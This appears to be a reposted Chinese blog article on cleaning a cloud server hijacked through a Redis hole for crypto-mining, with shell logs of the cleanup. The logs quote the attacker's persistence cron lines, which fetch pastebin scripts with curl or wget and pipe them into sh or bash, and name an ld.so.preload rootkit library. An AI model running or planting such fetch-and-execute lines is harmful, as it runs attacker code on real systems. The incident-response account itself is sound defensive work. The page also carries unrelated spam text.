中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何進行服務器被用來挖礦的異常問題處理

發布時間:2021-11-04 18:14:29 來源:億速云 閱讀:278 作者:柒染 欄目:建站服務器

這篇文章將為大家詳細講解有關如何進行服務器被用來挖礦的異常問題處理,文章內容質量較高,因此小編分享給大家做個參考,希望大家閱讀完這篇文章后對相關知識有一定的了解。

公司一臺阿里云ECS服務器分配給某團隊的開發人員拿去做開發測試機,不幸被人利用redis漏洞黑入把服務器用來挖礦了。下面是處理過程:

基本情況:

由于是開發測試機,分配之后全權給開發人員使用了,且直接給的root賬號。觀察到該ECS的CPU占用異常,好幾天都是100%,同時今天收到阿里云的安全告警說該ECS疑似有挖礦程序。

初步核查:

1、CPU占用一直在99%~100%,但top查看不到高占用的進程;

如何進行服務器被用來挖礦的異常問題處理

2、root用戶下發現來歷不明的定時任務且刪除后隔幾分鐘還是會自動添加。

[root@dev cron.d]# crontab -l

*/23 * * * *(curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh

##

[root@dev cron.d]#

處理過程:

1、首先修改了root賬號的密碼,并禁用了SSH的root登陸配置;

然后參考網上資料進行了如下處理:

(注意:清理前最好與正常的系統對比一下,確認哪些是正常系統不會有的)

2、處理來歷不明的定時任務

一開始只用crontab -e刪除,但發現幾分鐘后又有了,所以肯定還有別的配置,后面依次排查了/etc/cron*目錄和/var/spool/cron/root等處,與正常系統對比確認后,全部刪除,觀察半小時以上,終于確認干掉了來歷不明的定時任務。

[root@dev cron.d]# crontab -l

*/23 * * * *(curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh

##

[root@dev cron.d]#

[root@dev cron.d]# grep curl *

apache:*/17 * * * * root (curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh

root:*/10 * * * * root (curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh

[root@dev cron.d]#

[root@dev cron.daily]# ll

total 12

-rwx------ 1 root root 180 Jul 10  2003 logrotate

-rwx------ 1 root root 927 Mar 22  2017 makewhatis.cron

-rwxr-xr-x 1 root root 116 Mar 23  2017 oanacroner

[root@dev cron.daily]# grep curl *

oanacroner:(curl -fsSL https://pastebin.com/raw/tRxfvbYN || wget -q -O- https://pastebin.com/raw/tRxfvbYN)|base64 -d |/bin/bash

[root@dev cron.daily]# pwd

/etc/cron.daily

[root@dev cron.daily]# ll /etc/cron.daily/oanacroner

-rwxr-xr-x 1 root root 116 Mar 23  2017 /etc/cron.daily/oanacroner

[root@dev cron.daily]# 

[root@dev log]# ll /var/spool/cron/root

-rw-r--r-- 1 root root 113 Mar 23  2017 /var/spool/cron/root

[root@dev log]# cat /var/spool/cron/root

*/23 * * * *(curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh

##

[root@dev log]# 

[root@dev cron.d]# ll /var/spool/cron/crontabs/root

-rw-r--r-- 1 root root 113 Mar 23  2017 /var/spool/cron/crontabs/root

[root@dev cron.d]# cat /var/spool/cron/crontabs/root

*/31 * * * *(curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh

##

[root@dev cron.d]#

[root@dev cron.d]# date;crontab -l

Wed Oct 10 10:35:19 CST 2018

no crontab for root

[root@dev cron.d]# 

[root@dev cron.hourly]# ll

total 8

-rwxr-xr-x 1 root root 409 Aug 24  2016 0anacron

-rwxr-xr-x 1 root root 116 Mar 23  2017 oanacroner

[root@dev cron.hourly]# grep curl *

oanacroner:(curl -fsSL https://pastebin.com/raw/tRxfvbYN || wget -q -O- https://pastebin.com/raw/tRxfvbYN)|base64 -d |/bin/bash

[root@dev cron.hourly]# pwd

/etc/cron.hourly

[root@dev cron.hourly]# 

[root@dev etc]# cd cron.monthly

[root@dev cron.monthly]# ll

total 4

-rwxr-xr-x 1 root root 116 Mar 23  2017 oanacroner

[root@dev cron.monthly]# grep curl *

(curl -fsSL https://pastebin.com/raw/tRxfvbYN || wget -q -O- https://pastebin.com/raw/tRxfvbYN)|base64 -d |/bin/bash

[root@dev cron.monthly]# pwd

/etc/cron.monthly

[root@dev cron.monthly]# 

3、清理異常的文件

首先嘗試解決top命令查看不到大量占用CPU的異常進程的問題

參考網上資料,發現此處文件很可疑(正常系統不存在這個文件):

[root@dev tmp]# cd /usr/local/lib/

[root@dev lib]# ls

libdns.so

[root@dev lib]# ll

total 12

-rwxr-xr-x 1 root root 9436 Mar 23  2017 libdns.so

[root@dev lib]# pwd

/usr/local/lib

[root@dev lib]# 

刪除后top查看

如何進行服務器被用來挖礦的異常問題處理

kill掉大量占用CPU的2個異常進程的PID后,系統CPU占用很快就恢復正常了。

解決圖中的報錯:

ERROR: ld.so: object '/usr/local/lib/libdns.so' from /etc/ld.so.preload cannot be preloaded: ignored.

ERROR: ld.so: object '/usr/local/lib/libdns.so' from /etc/ld.so.preload cannot be preloaded: ignored.

[root@dev lib]# ll /etc/ld.so.preload

ERROR: ld.so: object '/usr/local/lib/libdns.so' from /etc/ld.so.preload cannot be preloaded: ignored.

ERROR: ld.so: object '/usr/local/lib/libdns.so' from /etc/ld.so.preload cannot be preloaded: ignored.

-rw-r--r-- 1 root root 50 Mar 23  2017 /etc/ld.so.preload

[root@dev lib]# vi /etc/ld.so.preload

ERROR: ld.so: object '/usr/local/lib/libdns.so' from /etc/ld.so.preload cannot be preloaded: ignored.

ERROR: ld.so: object '/usr/local/lib/libdns.so' from /etc/ld.so.preload cannot be preloaded: ignored.

[root@dev lib]# vi /etc/ld.so.preload

[root@dev lib]# ll /etc/ld.so.preload

-rw-r--r-- 1 root root 0 Oct 10 11:53 /etc/ld.so.preload

[root@dev lib]# rm -f /etc/ld.so.preload

[root@dev lib]# ll /etc/ld.so.preload

ls: cannot access /etc/ld.so.preload: No such file or directory

[root@dev lib]# 

刪除/etc/ld.so.preload后上面的報錯就沒了。

后面繼續排查,使用chkconfig --list發現有異常的開機啟動服務netdns,根據名字的相關性,合計查到下面的文件都是異常的,與正常系統對比后刪除。

/bin/dns

/usr/sbin/netdns

/etc/init.d/netdns(/etc/rc.d/init.d/netdns)

此外還有/tmp目錄下的一些文件

關于如何進行服務器被用來挖礦的異常問題處理就分享到這里了,希望以上內容可以對大家有一定的幫助,可以學到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

聂拉木县| 若羌县| 丰顺县| 唐河县| 仁布县| 金阳县| 太白县| 泾源县| 岳阳县| 芦溪县| 东阿县| 台安县| 温泉县| 响水县| 邻水| 桦川县| 凌源市| 毕节市| 铁岭市| 巴南区| 新河县| 永昌县| 革吉县| 兴海县| 琼结县| 射阳县| 临澧县| 沁水县| 清新县| 连州市| 措美县| 当雄县| 凤山县| 张北县| 鄱阳县| 社旗县| 河曲县| 毕节市| 宝坻区| 仁寿县| 锡林郭勒盟|